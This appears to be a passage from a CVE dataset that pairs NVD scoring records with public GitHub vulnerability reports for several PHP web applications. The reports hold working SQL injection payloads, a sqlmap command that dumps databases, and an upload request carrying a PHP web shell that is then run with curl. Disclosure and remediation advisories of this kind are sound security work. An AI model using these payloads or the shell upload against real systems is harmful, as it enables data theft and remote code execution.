+ During the security review of the "Stock Management System," Wang Haojian discovered a critical SQL injection vulnerability in the `createBrand.php` file. This vulnerability stems from inadequate validation of user inputs for the username and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ MySQL >= 5.0.12 AND time-based blind (query SLEEP)
## Vulnerability location:
+ 'brandName' parameter
## Payload:
```sql
brandName=11' RLIKE (SELECT (CASE WHEN (7581=7581) THEN 11 ELSE 0x28 END)) AND 'kYxl'='kYxl&brandStatus=1
brandName=11' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))kiXH) AND 'VTnH'='VTnH&brandStatus=1
```
```makefile
Parameter: brandName (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: brandName=11' RLIKE (SELECT (CASE WHEN (7581=7581) THEN 11 ELSE 0x28 END)) AND 'kYxl'='kYxl&brandStatus=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: brandName=11' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))kiXH) AND 'VTnH'='VTnH&brandStatus=1
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://localhost/stock/php_action/createBrand.php" --data="brandName=11&brandStatus=1" --method=POST --dbms=mysql --level=5 --risk=3 --batch --dbs --dump
```
+ 
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
| SourceCodester Stock Management System in PHP 1.0 createBrand.php SQL injection vulnerability | https://api.github.com/repos/HaojianWang/cve/issues/1/comments | 0 | 2024-05-28T04:56:11Z | 2024-05-28T04:56:11Z | https://github.com/HaojianWang/cve/issues/1 | 2,320,120,757 | 1 | 6,042 |
CVE-2024-5516 | 2024-05-30T14:15:09.277 | A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file massage.php. The manipulation of the argument bid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266587. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ppp-src/ha/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266587"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266587"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.346223"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ppp-src/ha/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266587"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266587"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.346223"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:adonesevangelista:online_blood_bank_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4F53F723-1E87-4190-A902-24A47378C80B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ppp-src/ha/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ppp-src",
"ha"
] | # Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "massage.php" SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Blood Bank Management System in PHP with Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-blood-bank-management-system-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ noobes
## Vulnerable File
+ massage.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/02/Blood-Bank-Management-System-in-Php-with-Source-Code-1.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'massage.php' file of the 'Online Blood Bank Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "bid" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the PHP "Online Blood Bank Management System", "noob" discovered a critical SQL injection vulnerability in the "massage.php" file. This vulnerability stems from insufficient user input validation of the "bid" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
+ boolean-based blind
## Vulnerability location:
+ 'bid' parameter
## Payload:
```
Payload: ------WebKitFormBoundary5pVPM2sdw5QlXfOx
```
```Parameter: MULTIPART bid ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: ------WebKitFormBoundary5pVPM2sdw5QlXfOx
Content-Disposition: form-data; name="bid"
111' AND 4176=(SELECT (CASE WHEN (4176=4176) THEN 4176 ELSE (SELECT 4425 UNION SELECT 8954) END))-- CaXL
------WebKitFormBoundary5pVPM2sdw5QlXfOx
Content-Disposition: form-data; name="signup"
Send
------WebKitFormBoundary5pVPM2sdw5QlXfOx--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundary5pVPM2sdw5QlXfOx
Content-Disposition: form-data; name="bid"
111' AND (SELECT 6421 FROM (SELECT(SLEEP(5)))gfjJ)-- BscZ
------WebKitFormBoundary5pVPM2sdw5QlXfOx
Content-Disposition: form-data; name="signup"
Send
------WebKitFormBoundary5pVPM2sdw5QlXfOx--
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
+ 
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
| Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "massage.php" SQL injection | https://api.github.com/repos/ppp-src/ha/issues/3/comments | 0 | 2024-05-29T02:22:54Z | 2024-05-29T02:22:54Z | https://github.com/ppp-src/ha/issues/3 | 2,322,218,913 | 3 | 6,043 |
CVE-2024-5517 | 2024-05-30T15:15:50.120 | A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file changepwd.php. The manipulation of the argument useremail leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266588. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ppp-src/ha/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266588"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266588"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.346225"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ppp-src/ha/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266588"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266588"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.346225"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:adonesevangelista:online_blood_bank_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4F53F723-1E87-4190-A902-24A47378C80B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ppp-src/ha/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ppp-src",
"ha"
] | # Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "changepwd.php" SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Blood Bank Management System in PHP with Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-blood-bank-management-system-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ noobes
## Vulnerable File
+ changepwd.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/02/Blood-Bank-Management-System-in-Php-with-Source-Code-1.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'changepwd.php' file of the 'Online Blood Bank Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "useremail" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the PHP Student Information Management System, noob discovered a critical SQL injection vulnerability in the "changepwd.PHP" file. This vulnerability stems from insufficient user input validation of the "useremail" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ 'useremail' parameter
## Payload:
```
tab=on&useremail=1@qq.com' AND (SELECT 2484 FROM (SELECT(SLEEP(5)))iuyF) AND 'CqHW'='CqHW&sub=Submit Email
```
```Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: tab=on&useremail=1@qq.com' AND (SELECT 2484 FROM (SELECT(SLEEP(5)))iuyF) AND 'CqHW'='CqHW&sub=Submit Email
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
+
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
| “Online Blood Bank Management System" in PHP 1.0 "changepwd.php" SQL injection | https://api.github.com/repos/ppp-src/ha/issues/4/comments | 0 | 2024-05-29T02:27:59Z | 2024-05-29T02:27:59Z | https://github.com/ppp-src/ha/issues/4 | 2,322,222,992 | 4 | 6,044 |
CVE-2024-5518 | 2024-05-30T16:15:19.327 | A vulnerability classified as critical has been found in itsourcecode Online Discussion Forum 1.0. This affects an unknown part of the file change_profile_picture.php. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266589 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/L1OudFd8cl09/CVE/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266589"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266589"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.346309"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/L1OudFd8cl09/CVE/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266589"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266589"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.346309"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:emiloimagtolis:online_discussion_forum:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BBF4F74-D6A3-4E10-AA60-6B1E1595C2D4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/L1OudFd8cl09/CVE/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"L1OudFd8cl09",
"CVE"
] | # Itsourcecode Online Discussion Forum Project in PHP with Source Code v1.0 change_profile_picture.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Online Discussion Forum Project in PHP with Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-discussion-forum-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ N3xu5Cr4ck37
## Vulnerable File
+ change_profile_picture.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2015/11/bcc_forum.zip
# PROBLEM TYPE
## Vulnerability Type
+ Unrestricted Upload
## Root Cause
+ In line 13 of the change_profile_picture.php file,The input obtained through $- FILES is directly used to determine the storage location of the file, without conducting a complete security check. The specific code snippet is as follows:
<img width="633" alt="1" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/26ab63e8-e0a0-414f-af55-87b5250da8bc">
## Impact
+ Attackers can exploit this vulnerability to upload malicious files without restriction, which can lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Exploiting malicious files can lead to remote attacks on RCE
# DESCRIPTION
+ The file upload operation was triggered on line 13 of the "change_profile_picture.php" file, and the uploaded file was received using the "$- FILES" variable. Due to the lack of appropriate input validation and cleaning, remote attackers only need to use regular user login to pass malicious payloads through this file upload function, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
```
POST /members/update_profile_picture.php HTTP/1.1
Host: 192.168.210.199:1218
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------10405231092695549021896513402
Content-Length: 260
Origin: http://192.168.210.199:1218
Connection: close
Referer: http://192.168.210.199:1218/members/change_profile_picture_modal.php?id=65
Upgrade-Insecure-Requests: 1
Priority: u=1
-----------------------------10405231092695549021896513402
Content-Disposition: form-data; name="image"; filename="123.php"
Content-Type: application/octet-stream
<?php system("ipconfig"); ?>
-----------------------------10405231092695549021896513402--
```
<img width="911" alt="2" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/6cc4e50e-7ab4-4142-b86e-ba35dcd23e90">
## I successfully executed the PHP script on the terminal
```bash
curl http://192.168.210.199:1218/uploads/123.php
```
<img width="314" alt="3" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/ae264c2f-bb43-4b17-a382-687da278e305"> | Itsourcecode Online Discussion Forum Project in PHP with Source Code v1.0 change_profile_picture.php Unrestricted Upload | https://api.github.com/repos/L1OudFd8cl09/CVE/issues/1/comments | 0 | 2024-06-03T01:08:35Z | 2024-06-03T01:27:33Z | https://github.com/L1OudFd8cl09/CVE/issues/1 | 2,329,970,193 | 1 | 6,045 |
CVE-2024-5519 | 2024-05-30T16:15:19.613 | A vulnerability classified as critical was found in ItsourceCode Learning Management System Project In PHP 1.0. This vulnerability affects unknown code of the file login.php. The manipulation of the argument user_email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-266590 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
